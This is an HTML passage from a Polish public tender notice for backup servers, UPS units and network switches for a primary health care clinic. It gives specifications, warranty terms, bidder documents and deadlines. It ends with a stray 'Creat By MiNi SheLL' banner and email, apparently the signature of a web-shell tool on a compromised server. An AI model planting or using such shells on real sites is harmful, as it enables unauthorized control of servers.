wyłączeniowe</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z wymogami SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja producenta na serwery</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">I. Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu - nie dotyczy.<br/>II. cd OPZ:<br/>23. Zabezpieczenie wejściowe	Przeciwzwarciowe – Bezpiecznik automatyczny 16 A / 250 V AC, Przeciwprzepięciowe<br/>24. Zabezpieczenie wyjściowe	Elektroniczne – przeciwzwarciowe i przeciążeniowe<br/>25. Przyłącze zasilania UPS	IEC320 C14<br/>26. Przyłącza wyjściowe (liczba i typ gniazd)	6xIEC320 C13<br/>27. Sygnalizacja	Akustyczno – optyczna; diody LED (minimum sygnalizujące naładowanie/rozładowanie akumulatorów, obciążenie, tryb pracy, zadziałanie AVR)<br/>28. Interfejsy komunikacyjne	USB HID<br/>29. Oprogramowanie monitorująco-zarządzające	oprogramowanie w języku polskim do zarządzania i monitorowania pracy zasilacza, wymagane wsparcie producenta (telefoniczne oraz mailowe) w języku polskim w zakresie konfiguracji oraz help desk, wsparcie dla systemów Linux, Windows oraz wirtualizacji Hyper-V, Vmware, XenServer<br/>30. Deklaracje Deklaracja CE producenta sprzętu <br/>31. Gwarancja i serwis	Gwarancja - minimum 36 miesięcy na elektronikę i 24 miesiące na akumulatory, liczona od chwili podpisania protokołu odbioru bez uwag, przy czym świadczenie gwarancyjne w zakresie sprzętu realizowane będzie przez autoryzowany serwis producenta zlokalizowany w Polsce w systemie door to door. Naprawa zakupionego towaru ma być dokonana w terminie max. 4 dni roboczych licząc od dnia otrzymania zawiadomienia o usterce, albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki). <br/>3.	Switch – 2 szt. <br/>w konfiguracji nie gorszej niż:<br/>Charakterystyka / wymagania minimalne:<br/>1. Typ obudowy	Desktop/do szaf RACK<br/>2. Klasa przełącznika	Zarządzalny<br/>3. Architektura sieci	Gigabit Ethernet<br/>4. Złącza	RJ-45 10/100/1000 Mbps - 24 szt.<br/>5. Gwarancja	Gwarancja – min. 36 miesięcy (gwarancja producenta liczona od chwili podpisania protokołu odbioru bez uwag, przy czym świadczenie gwarancyjne w zakresie sprzętu realizowane będzie przez autoryzowany serwis producenta zlokalizowany w Polsce w systemie door to door. Naprawa zakupionego towaru ma być dokonana w terminie max. 4 dni roboczych licząc od dnia otrzymania zawiadomienia o usterce, albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki).<br/><br/>Dla wyspecyfikowanego urządzenia podane parametry są wartościami minimalnymi, sprzęt<br/>o parametrach lepszych, wyższych od wyspecyfikowanych spełnia wymagania określone przez Zamawiającego. Urządzenie<br/>powinno spełniać wszelkie przepisy dot. prawa dopuszczenia do użytkowania w Polsce oraz posiadać stosowne dokumenty<br/>świadczące o spełnianiu wszystkich niezbędnych norm i wytycznych, które powinien spełniać w/w sprzęt przed dopuszczeniem go<br/>do użytkowania.<br/>Tam, gdzie w Opisie przedmiotu zamówienia został wskazany znak towarowy (marka), patent lub pochodzenie, źródło lub<br/>szczególny proces, który charakteryzuje produkty lub usługi dostarczone przez konkretnego Wykonawcę lub nastąpiło wskazanie<br/>norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz<br/>ust. 3 ustawy, Zamawiający zgodnie z art. 99 ust. 5 ustawy dopuszcza złożenie oferty równoważnej lub zgodnie z art. 101 ust. 4<br/>ustawy zaoferowanie rozwiązań „równoważnych” w stosunku do wskazanych w Opisie przedmiotu zamówienia pod warunkiem, że<br/>zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w SWZ.<br/>W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych, w rozumieniu art. 99 ust. 5 lub art. 101<br/>ust. 4 ustawy Pzp, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą kart technicznych lub<br/>innych dokumentów potwierdzających, że oferowana oferta lub rozwiązania równoważne spełniają wymagania Zamawiającego<br/>określone w opisie przedmiotu zamówienia.<br/>Ze wzgl. na ogr. ilość znaków pozostałe informacje w SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">I. Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu - nie dotyczy.<br/>II. CD OPZ:<br/>16. Zarządzanie zdalne	Serwer musi być wyposażony w kartę zdalnego zarządzania (konsoli) z dedykowanym portem RJ45 pozwalającą na: włączenie, wyłączenie i restart serwera, podgląd logów sprzętowych serwera i karty, przejęcie pełnej konsoli tekstowej o serwera niezależnie od jego stanu (także podczas startu, restartu OS). <br/>17. Chłodzenie	Wentylator <br/>18. Gwarancja	Minimum 36 miesięczna gwarancja producenta realizowana w miejscu jego instalacji (on-site) przez Producenta lub Autoryzowanego Partnera Serwisowego Producenta<br/>liczona od chwili podpisania protokołu odbioru bez uwag, przy czym świadczenie gwarancyjne w zakresie sprzętu realizowane będzie przez producenta lub autoryzowanego partnera serwisowego producenta w siedzibie Zamawiającego, a czas reakcji serwisu nastąpi nie później niż do końca następnego dnia roboczego. Naprawa zakupionego towaru ma być dokonana w terminie max. 4 dni roboczych licząc od dnia otrzymania zawiadomienia o usterce, albo do dnia uzgodnionego z Zamawiającym (uwzględniającego czas niezbędny do usunięcia usterki).<br/>19. Dostępność dla osób niepełnosprawnych	Możliwość obsługi systemu przez osoby niepełnosprawne.<br/>20. Oprogramowanie backupowe<br/>(serwera backupu)	1.Rodzaj danych: typ danych, które będą objęte backupem (np. dokumenty, bazy danych, e-maile).<br/>2.Częstotliwość backupu: (np. codziennie, co godzinę).<br/>3.Metody backupu: Typy backupu, takie jak: pełny, różnicowy, przyrostowy.<br/>4.Lokalizacja przechowywania: przechowywane backupy (lokalnie, na zewnętrznym nośniku).<br/>5.Bezpieczeństwo: Szyfrowanie danych, dostęp do backupów, ochrona przed nieautoryzowanym dostępem.<br/>6.Zarządzanie wersjami: Jak będą zarządzane różne wersje plików i jak długo będą przechowywane.<br/>7.Kompatybilność: z systemami operacyjnymi Windows Serwer i Linux<br/>8.Odzyskiwanie danych: Procedury na odzyskiwanie danych z backupu.<br/>9.Monitorowanie i raportowanie: Możliwości monitorowania stanu backupu i generowania raportów.<br/><br/>2.	Zasilacz awaryjny UPS - 2 szt.<br/>w konfiguracji nie gorszej niż:<br/>Charakterystyka / wymagania minimalne:<br/>1. Topologia	VI (line-interactive)<br/>2. Moc pozorna	2000 VA<br/>3. Moc czynna	1300 W<br/>4. Typ obudowy	rack<br/>5. Temperatura pracy	- 0 ÷ +40 °C<br/>6. Napięcie znamionowe (wartość skuteczna)	230 V AC<br/>7. Zakres napięcia wejściowego (wartości skuteczne) i tolerancja 160 ÷ 264 V (~ 145 ÷ 280 V) ± 2 %<br/>8. Częstotliwość znamionowa napięcia wejściowego	50 Hz<br/>9. Zakres częstotliwości i tolerancja	45 ÷ 55 Hz ± 1 Hz<br/>10. Progi przełączania: sieć – UPS	160 ÷ 264 V (~ 145 ÷ 280 V) ± 2 %<br/>11. Napięcie znamionowe (wartość skuteczna)	230 V AC<br/>12. Zakres napięcia wyjściowego (wartości skuteczne) i tolerancja	praca sieciowa - 184 ÷ 264 V (~ 167 ÷ 280 V) ± 2 %<br/>13. Zakres napięcia wyjściowego (wartości skuteczne) i tolerancja	praca rezerwowa - 230 V ± 5 %<br/>14. Regulacja napięcia	Automatyczna regulacja napięcia (AVR)<br/>15. Kształt napięcia wyjściowego (przy pracy rezerwowej / sieciowej) -	Sinusoidalny / Tak jak na wejściu<br/>16. Częstotliwość znamionowa napięcia wyjściowego	50 Hz<br/>17. Filtracja napięcia wyjściowego	LC, Filtr przeciwzakłóceniowy RFI/EMI, tłumik warystorowy<br/>18. Progi przełączania	UPS – sieć	~165 V / 259 V (~ 150 V / 275 V) ± 2 %<br/>19. Czas przełączenia na pracę rezerwową &lt; 3 ms<br/>20. Czas powrotu na pracę sieciową	0 ms<br/>21. Czas podtrzymania z baterii wewnętrznych <br/>(100 % / 80 % / 50 % Pmax)	minimum 4 / 5 / 9 min.<br/>22. Wymiary - rack (wys. x szer. x gł.) - nie większe niż 132 (3U) x 483 (&#39;19) x 400 mm<br/>Masa zasilacza	nie większa niż 30 kg<br/>(...)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>2. W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych w rozumieniu art. 99 ust. 5 lub<br/>art. 101 ust. 4 ustawy, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą kart<br/>technicznych lub innych równoważnych dokumentów potwierdzających, że oferowana oferta/rozwiązania równoważne<br/>spełniają wymagania Zamawiającego opisane w przedmiocie zamówienia.<br/>Jeżeli Wykonawca nie złoży ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób<br/>równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia, Zamawiający nie będzie wzywał do ich<br/>złożenia/uzupełnienia). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wraz z ofertą należy złożyć:<br/>1.1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania, w zakresie<br/>wskazanym w rozdziale V SWZ – zgodnie z załącznikiem nr 2 do SWZ. Oświadczenie stanowi dowód potwierdzający brak<br/>podstaw wykluczenia na dzień składania ofert. Oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej<br/>(w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>1.2. Załącznik nr 1A do SWZ – Szczegółowa oferta przedmiotowa, który należy złożyć pod rygorem nieważności, w formie<br/>elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>1.3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia<br/>publicznego.<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci papierowej i<br/>opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z<br/>pełnomocnictwem w postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub<br/>notariusz.<br/>1.4. Spis wszystkich załączonych dokumentów (spis treści) – zalecane, niewymagane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – zgodnie z ust. 3.2. rozdz. XI SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga:<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą albo z umowy<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art.<br/>125 ustawy (ust. 3.1. rozdziału XI SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw<br/>wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania w oparciu o wskazane w SWZ podstawy wykluczenia.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zastrzega sobie możliwość dokonania zmian w umowie w przypadkach i na warunkach jak niżej:<br/>1) Zmiana wynagrodzenia - może nastąpić w przypadku zmiany w trakcie obowiązywania niniejszej umowy stawki podatku<br/>VAT, zgodnie z wprowadzonymi przepisami,<br/>2) zmiana przedmiotu umowy polegająca na zastąpieniu urządzenia wymienionego w ofercie Wykonawcy innym<br/>urządzeniem, pod warunkiem zachowania minimalnych parametrów<br/>i pierwotnego przeznaczenia zastępowanego urządzenia (wynikających z opisu przedmiotu zamówienia lub kryteriów oceny<br/>ofert), w przypadku: zaprzestania produkcji urządzenia wymienionego w ofercie Wykonawcy przez jego producenta.<br/>Wykonawca musi przedstawić oświadczenie producenta sprzętu o zaprzestaniu produkcji w/w urządzenia.<br/>3) Zmiany terminu realizacji przedmiotu umowy:<br/>a) z przyczyn obiektywnych i niezależnych od Wykonawcy i producenta to jest<br/>w przypadku braku komponentów lub materiałów na rynku do produkcji sprzętu objętego niniejszą umową.<br/>Wykonawca musi przedstawić oświadczenie producenta sprzętu jakich komponentów lub materiałów brakuje do wykonania<br/>umowy w terminie,<br/>b) w przypadku zmiany terminu realizacji Projektu i jego poszczególnych etapów,<br/>c) w następstwie siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do<br/>przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności a które<br/>uniemożliwia Wykonawcy wykonanie przedmiotu umowy. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych,<br/>powstałego na skutek działania siły wyższej. (Pod pojęciem siły wyższej rozumie się w szczególności zdarzenia i<br/>okoliczności takie jak: klęska żywiołowa, działania wojenne, rebelie, terroryzm, rewolucja, powstanie, inwazja, bunt,<br/>zamieszki, strajk spowodowany przez inne osoby - nie związane z realizacją umowy, itp.),<br/>Termin wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności celem wykonania przedmiotu umowy w<br/>sposób należyty. Zmiana terminu realizacji następuje o okres w którym wystąpiły wyżej wymienione okoliczności<br/>warunkujące zmianę terminu wykonania umowy.<br/>2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności<br/>takiej umowy. W przypadku wystąpienia okoliczności stanowiących podstawę do zmiany umowy, każda ze Stron może<br/>wystąpić z wnioskiem na piśmie w sprawie możliwości dokonania takiej zmiany. We wniosku należy opisać, uzasadnić<br/>okoliczności warunkujące zmianę oraz dołączyć stosowne dokumenty – dotyczy to przypadków kiedy dla potwierdzenia<br/>dokonania zmiany zasadnym jest przedłożenie odpowiednich dokumentów.<br/>3. Zmiana postanowień niniejszej umowy może nastąpić jedynie wtedy, gdy nie jest ona sprzeczna z ustawą Prawo<br/>zamówień publicznych i wymaga zachowania formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia zakładki „Oferty/wnioski” widocznej w podglądzie przedmiotowego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ofertę należy sporządzić na formularzu oferty lub według takiego samego schematu, stanowiącego załącznik nr 1 do<br/>SWZ.<br/>Ofertę należy złożyć pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Oferta wraz z załącznikami musi być złożona za pośrednictwem zakładki „Oferty/wnioski” udostępnionej na platformie<br/>ezamówienia.<br/>3. Zamawiający wykluczy z post. Wykonawcę w przypadkach, o których mowa w art. 108 ust. 1 pkt 1-6 ustawy (obligatoryjne<br/>przesłanki wykluczenia) oraz w przypadkach, o których mowa w art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczeg. rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego.<br/>4. Zamawiający wymaga złożenia oświadczenia, o którym mowa w art 125 ust 1 ustawy Pzp tylko w zakresie<br/>potwierdzającym brak podstaw wykluczenia z postępowania.<br/>5. Pełna nazwa zamówienia:<br/>Dostawa serwera backupowego wraz z oprogramowaniem serwerowym i backupowym, serwera <br/>do archiwizacji bazy danych oprogramowania do obsługi poradni, archiwizacji dokumentacji medycznej, skanów dokumentów dołączanych do dokumentacji, dwóch zasilaczy awaryjnych UPS oraz dwóch switch-ów realizowane w ramach projektu pod nazwą <br/>„Wsparcie podstawowej opieki zdrowotnej (POZ)”.<br/>6. Po wyborze najkorzystniejszej oferty, w celu zawarcia umowy w sprawie zamówienia publicznego, Wykonawca<br/>zobowiązany będzie do:<br/>1) Złożenia dokumentu pełnomocnictwa dla osoby zawierającej umowę w imieniu Wykonawcy, o ile upoważnienie do<br/>reprezentowania Wykonawcy nie wynika z dokumentów rejestrowych Wykonawcy, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, lub dokument pełnomocnictwa nie został wcześniej złożony w trakcie<br/>postępowania o udzielenie zamówienia,<br/>2) W przypadku dokonania wyboru najkorzystniejszej oferty złożonej przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia należy przedłożyć umowę regulującą współpracę tych podmiotów (np. umowa konsorcjum, umowa<br/>spółki cywilnej),<br/>3) Złożenia oświadczenia producenta o spełnieniu minimalnych wymaganych parametrów określonych w OPZ,<br/>4) Złożenia kart katalogowych (produktowych) zaoferowanego sprzętu w języku polskim.

Creat By MiNi SheLL
Email: jattceo@gmail.com